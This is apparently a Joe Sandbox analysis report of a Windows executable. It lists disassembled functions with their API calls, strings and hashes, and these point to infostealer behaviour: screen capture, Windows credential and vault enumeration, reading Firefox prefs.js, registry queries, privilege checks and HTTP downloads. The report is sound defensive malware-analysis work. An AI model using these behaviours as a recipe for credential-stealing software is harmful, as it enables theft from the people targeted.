_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463B7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463BD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846420
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846426
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184642C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184644E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846454
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184645A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846466
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846487

Strings

exists, xrefs: 00007FF621846398, 00007FF6218463E3, 00007FF62184647A
filename, xrefs: 00007FF62184549A, 00007FF621845A28, 00007FF621845F59
content, xrefs: 00007FF6218455A3, 00007FF621845BF6, 00007FF621846120
directory_iterator::directory_iterator, xrefs: 00007FF621846441
status, xrefs: 00007FF621846403, 00007FF621846413

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
String ID: content$directory_iterator::directory_iterator$exists$filename$status
API String ID: 1254564140-3429737954
Opcode ID: b8e24a444095047ea094e7c09fe6821861be314c234fe9f9b104f0c88fbe9ef3
Instruction ID: b40bb229f228e59d3e8b6444e9953a985b67cd4a506c48e63864069422eee5e8
Opcode Fuzzy Hash: b8e24a444095047ea094e7c09fe6821861be314c234fe9f9b104f0c88fbe9ef3
Instruction Fuzzy Hash: 74E27172A18BC189EB218F34DC803ED73A5FB85758F505236EA5D8BA99DF78D284C341

Function 00007FF621876350 Relevance: 46.6, APIs: 20, Strings: 6, Instructions: 1136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

exists, xrefs: 00007FF62187A5DE, 00007FF62187A6AC, 00007FF62187A76E, 00007FF62187A83C
recursive_directory_iterator::recursive_directory_iterator, xrefs: 00007FF62187A68F, 00007FF62187A6C9, 00007FF62187A81F
directory_iterator::directory_iterator, xrefs: 00007FF62187A853, 00007FF62187A875, 00007FF62187A8AD
cannot use push_back() with , xrefs: 00007FF62187A625, 00007FF62187A6FE, 00007FF62187A7B5
status, xrefs: 00007FF62187A600, 00007FF62187A6D9, 00007FF62187A790, 00007FF62187A863, 00007FF62187A885, 00007FF62187A89B, 00007FF62187A8BD
recursive_directory_iterator::operator++, xrefs: 00007FF62187A678, 00007FF62187A745, 00007FF62187A808

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: __std_fs_convert_wide_to_narrow$__std_fs_code_page
String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$recursive_directory_iterator::operator++$recursive_directory_iterator::recursive_directory_iterator$status
API String ID: 3645842244-1862120484
Opcode ID: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
Instruction ID: f2e3ee8d30fa8a21af3ac5413577cf100a1c5fa3362334e89f25f1ce48253030
Opcode Fuzzy Hash: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
Instruction Fuzzy Hash: 0AD2277291CBC585DA708B19F8812ABB3A0FBD9784F505225EACC97B59EF7CD250CB40

Function 00007FF621895B70 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 225
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00007FF621895BB1
GetSystemMetrics.USER32 ref: 00007FF621895BBF
GetSystemMetrics.USER32 ref: 00007FF621895BCD
GetSystemMetrics.USER32 ref: 00007FF621895BDB
GetDC.USER32 ref: 00007FF621895BE5
GetDeviceCaps.GDI32 ref: 00007FF621895BFB
GetDeviceCaps.GDI32 ref: 00007FF621895C0B
CreateCompatibleDC.GDI32 ref: 00007FF621895C18
CreateCompatibleBitmap.GDI32 ref: 00007FF621895C30
SelectObject.GDI32 ref: 00007FF621895C46
BitBlt.GDI32 ref: 00007FF621895C7C
SHCreateMemStream.SHLWAPI ref: 00007FF621895CB2
SelectObject.GDI32 ref: 00007FF621895CC8
DeleteDC.GDI32 ref: 00007FF621895CD1
ReleaseDC.USER32 ref: 00007FF621895CDC
DeleteObject.GDI32 ref: 00007FF621895CE5
EnterCriticalSection.KERNEL32 ref: 00007FF621895DDC
LeaveCriticalSection.KERNEL32 ref: 00007FF621895DEE
IStream_Size.SHLWAPI ref: 00007FF621895E25
IStream_Reset.SHLWAPI ref: 00007FF621895E36
IStream_Read.SHLWAPI ref: 00007FF621895EBB
SelectObject.GDI32 ref: 00007FF621895F15
DeleteDC.GDI32 ref: 00007FF621895F1E
ReleaseDC.USER32 ref: 00007FF621895F2B
DeleteObject.GDI32 ref: 00007FF621895F34

Strings

, xrefs: 00007FF621895C51

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
String ID:
API String ID: 3214587331-3916222277
Opcode ID: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
Instruction ID: 77fc1091feb1a2493b535f555881c10565953bd1444102cdc689d2ff45defb03
Opcode Fuzzy Hash: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
Instruction Fuzzy Hash: 2DB1317660CBC186EB60DF21E8943AAB7A5FB89B80F508535EA8DC3B55DF3CD1448B41

Function 00007FF62184D570 Relevance: 35.9, APIs: 17, Strings: 3, Instructions: 862
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF62184D65C
GetProcAddress.KERNEL32 ref: 00007FF62184D767
GetProcAddress.KERNEL32 ref: 00007FF62184D829
GetProcAddress.KERNEL32 ref: 00007FF62184D8A3
GetProcAddress.KERNEL32 ref: 00007FF62184D925
GetProcAddress.KERNEL32 ref: 00007FF62184D99F
GetProcAddress.KERNEL32 ref: 00007FF62184DA23
FreeLibrary.KERNEL32 ref: 00007FF62184E551
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E587
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5ED
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5F3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E5FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184E605

Strings

vault, xrefs: 00007FF62184E3B3
cannot use push_back() with , xrefs: 00007FF62184E59F
system, xrefs: 00007FF62184E35D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AddressProc$Library$FreeLoad
String ID: cannot use push_back() with $system$vault
API String ID: 2463004387-1741236777
Opcode ID: f7d1234b376e4039a5471e577c4ebbc8a242b25a50f59d97433a167ce32524bd
Instruction ID: d3334392f8a0a605b3eff4eed18d4785aa382d0454ef4d0d42de2a65be381bce
Opcode Fuzzy Hash: f7d1234b376e4039a5471e577c4ebbc8a242b25a50f59d97433a167ce32524bd
Instruction Fuzzy Hash: 53924E32609BC589DB608F25EC843ED77A4FB49798F104225EB9D8BB99EF78D644C301

Function 00007FF621842CA0 Relevance: 32.3, APIs: 13, Strings: 5, Instructions: 789
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF621843022
RegQueryValueExA.ADVAPI32 ref: 00007FF62184306A
RegCloseKey.ADVAPI32 ref: 00007FF6218430F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218439B0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218439CB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218439D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218439EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218439F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621843A06
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621843A0C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621843A12
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621843A1E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621843A24

Strings

exists, xrefs: 00007FF6218439BE
filename, xrefs: 00007FF621843500
content, xrefs: 00007FF621843694
directory_iterator::directory_iterator, xrefs: 00007FF6218439DD
status, xrefs: 00007FF6218439F9

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
String ID: content$directory_iterator::directory_iterator$exists$filename$status
API String ID: 1254564140-3429737954
Opcode ID: 6eb2e89913d96bb1f695ad610773058d9fbfef6bca6c2b5fc8a5d9499f7a4f67
Instruction ID: 6da8661ebf562ca649b6e728f0136cb3384b7451878a9f19eb88dabd3df638a8
Opcode Fuzzy Hash: 6eb2e89913d96bb1f695ad610773058d9fbfef6bca6c2b5fc8a5d9499f7a4f67
Instruction Fuzzy Hash: 47827E72A19BC589EB208F35DC803ED73A1FB89798F105225EA9D97B99DF38D580C341

Function 00007FF6218420B0 Relevance: 28.7, APIs: 12, Strings: 4, Instructions: 684
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF621842409
RegQueryValueExA.ADVAPI32 ref: 00007FF62184244E
RegCloseKey.ADVAPI32 ref: 00007FF6218424F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C2E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621842C95

Strings

exists, xrefs: 00007FF621842C42
filename, xrefs: 00007FF621842787
content, xrefs: 00007FF621842915
directory_iterator::directory_iterator, xrefs: 00007FF621842C64

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
String ID: content$directory_iterator::directory_iterator$exists$filename
API String ID: 1254564140-1400943384
Opcode ID: fae387b57f4c03358210ea7f768a9898765801ec24d978a3657b7fff7c85aad3
Instruction ID: 0e0b393b32fb550a28a0ba379f5651ebdda5ea361b5a65872b93029e424496ae
Opcode Fuzzy Hash: fae387b57f4c03358210ea7f768a9898765801ec24d978a3657b7fff7c85aad3
Instruction Fuzzy Hash: E4728272A18BC589DB108F35DC803ED77A5FB89798F109225EA9D97B99DF38D280C341

Function 00007FF62187D080 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 599
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

prefs.js, xrefs: 00007FF62187E5E2
exists, xrefs: 00007FF62187F48D
cannot use push_back() with , xrefs: 00007FF62187DDD5
directory_iterator::directory_iterator, xrefs: 00007FF62187DE23, 00007FF62187F4A4
status, xrefs: 00007FF62187DE11, 00007FF62187DE33, 00007FF62187DE5B, 00007FF62187DE83

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$prefs.js$status
API String ID: 0-2713369562
Opcode ID: 478bf8cf75d8da7de2c7043dd069877a55a00f102fa1e3b931d1646edbca9206
Instruction ID: 6f678bcc635a7d820584f6d73a99218ad0d0a183da3106379372e893864ff8ac
Opcode Fuzzy Hash: 478bf8cf75d8da7de2c7043dd069877a55a00f102fa1e3b931d1646edbca9206
Instruction Fuzzy Hash: 4A523732A0DFC585DB719B15E8803EAB3A4FB89784F505226DACC86B59EF3CD195CB01

Function 00007FF6218CB5B0 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF6218CB65D
GetLastError.KERNEL32 ref: 00007FF6218CB667
FindFirstFileW.KERNEL32 ref: 00007FF6218CB67E
GetLastError.KERNEL32 ref: 00007FF6218CB68A
FindClose.KERNEL32 ref: 00007FF6218CB698
__std_fs_open_handle.LIBCPMT ref: 00007FF6218CB72B
CloseHandle.KERNEL32 ref: 00007FF6218CB741
CloseHandle.KERNEL32 ref: 00007FF6218CB8B4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
String ID:
API String ID: 2398595512-0
Opcode ID: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
Instruction ID: 58e0680d9fe8e89ebbb33a089060912749bd8e540b0d0813a28061e8d1ea34ba
Opcode Fuzzy Hash: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
Instruction Fuzzy Hash: 0B914E35A0CE4286EF788B25AC8467A2290EF457F4F184734E97EC7AD4DF3CE9058642

Function 00007FF62184CA10 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CredEnumerateA.ADVAPI32 ref: 00007FF62184CA72
CredFree.ADVAPI32 ref: 00007FF62184D496
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D4CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D520
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D526
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D52C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D532
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D538
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D53E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D544
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184D54A

Strings

cannot use push_back() with , xrefs: 00007FF62184D4E4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Cred$EnumerateFree
String ID: cannot use push_back() with
API String ID: 1347986415-4122110429
Opcode ID: 2505efc4b78ffb2a923c6d5d5ff044c11971b7f56b9856ff3c03a91b00edabd2
Instruction ID: 8743744a6d839be6701c207cbd523abfa4ec94a217da4292c23b8afa4a449650
Opcode Fuzzy Hash: 2505efc4b78ffb2a923c6d5d5ff044c11971b7f56b9856ff3c03a91b00edabd2
Instruction Fuzzy Hash: B3627072A08BC589EB208F25E8803ED7765F789798F504325EA9D87B99DF3CD284C741

Function 00007FF621859F80 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62185A134
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62185A142
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62185A3C5
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF62185A3D3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A570
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A576
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A599
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A59F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A5A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A5C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185A5CE

Strings

value, xrefs: 00007FF62185A05A, 00007FF62185A2F3

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
String ID: value
API String ID: 1346393832-494360628
Opcode ID: c8fe9615e931390359ee70bbff2f470a871c1d67102b4ff7fd912447be9e121d
Instruction ID: 072cf9c959f6fca6d4f9df3cb6091378c6317178bdc5373aae6183205305138d
Opcode Fuzzy Hash: c8fe9615e931390359ee70bbff2f470a871c1d67102b4ff7fd912447be9e121d
Instruction Fuzzy Hash: 5E028F62A1CBC199EF00CB74D8C02AD6B61EB857A4F505231FA9ED2ADADF7CD185C701

Function 00007FF62188C600 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62188F820: GetCurrentProcess.KERNEL32 ref: 00007FF62188F85B
Part of subcall function 00007FF62188F820: OpenProcessToken.ADVAPI32 ref: 00007FF62188F86E
Part of subcall function 00007FF62188F820: GetTokenInformation.KERNELBASE ref: 00007FF62188F8AA
Part of subcall function 00007FF62188F820: CloseHandle.KERNEL32 ref: 00007FF62188F8CB

ExitProcess.KERNEL32 ref: 00007FF62188C647
OpenMutexA.KERNEL32 ref: 00007FF62188C762
ExitProcess.KERNEL32 ref: 00007FF62188C772

Part of subcall function 00007FF62188FB60: GetModuleFileNameW.KERNEL32 ref: 00007FF62188FBAA

Part of subcall function 00007FF62189A780: CoInitializeEx.OLE32 ref: 00007FF62189A7EA

Strings

SeDebugPrivilege, xrefs: 00007FF62188C64E
SeImpersonatePrivilege, xrefs: 00007FF62188C65A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Process$ExitOpenToken$CloseCurrentFileHandleInformationInitializeModuleMutexName
String ID: SeDebugPrivilege$SeImpersonatePrivilege
API String ID: 3348294976-3768118664
Opcode ID: 94d7e54a576bcb9953fbbb2ae0b3abcb42d62c724ea9bddeac3101a960a8ad1b
Instruction ID: 99a3e4807bd13cccc6b48ca3c28fbd84cb116feb345d7814fb3e0c17f3ca8429
Opcode Fuzzy Hash: 94d7e54a576bcb9953fbbb2ae0b3abcb42d62c724ea9bddeac3101a960a8ad1b
Instruction Fuzzy Hash: C2619322D1DA8A42EF10AB64ECD13BE6394FF85794F505535E68EC26DBDF2CE1418702

Function 00007FF621895240 Relevance: 16.9, APIs: 11, Instructions: 408networkfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET ref: 00007FF62189540B
InternetOpenUrlA.WININET ref: 00007FF6218954E8
HttpQueryInfoW.WININET ref: 00007FF621895549
HttpQueryInfoW.WININET ref: 00007FF6218955E2
InternetQueryDataAvailable.WININET ref: 00007FF621895626
InternetReadFile.WININET ref: 00007FF6218956E9
InternetQueryDataAvailable.WININET ref: 00007FF6218957B4
InternetCloseHandle.WININET ref: 00007FF62189585E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218958AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218958B5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218958BB

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
